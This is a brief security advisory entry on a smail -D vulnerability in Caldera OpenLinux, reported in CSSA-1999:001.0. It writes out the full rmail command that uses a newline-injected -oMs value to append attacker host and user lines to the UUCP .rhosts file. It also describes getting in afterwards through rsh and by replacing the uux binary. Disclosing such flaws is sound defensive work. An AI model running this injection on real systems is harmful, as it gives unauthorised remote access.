|
|
Caldera OpenLinux 'smail -D' Command Vulnerability
According to the Caldera advisory (CSSA-1999:001.0), smail's -D option names the debug file to use. If an attacker submits a UUCP job containing the following rmail invocation: rmail -N -D /usr/lib/uucp/.rhosts -oMs "joe\nhostname user\n" uucp where '\n' is a newline, and 'hostname' and 'user' specify the attacking host and user, then 'smail' will happily append the following to the UUCP '.rhosts' file: rmail: Debugging started: pid=25919 write_log:Received FROM:uucp HOST:joe hostname user PROGRAM:rmail SIZE:99 ... some more lines ... The attacker can then 'rsh' into the target host and try to exploit the UUCP account (e.g. by replacing the 'uux' binary). Note that this hole is also exploitable locally; all you have to do is call 'uux rmail ....' to make it work. |
|
Privacy Statement |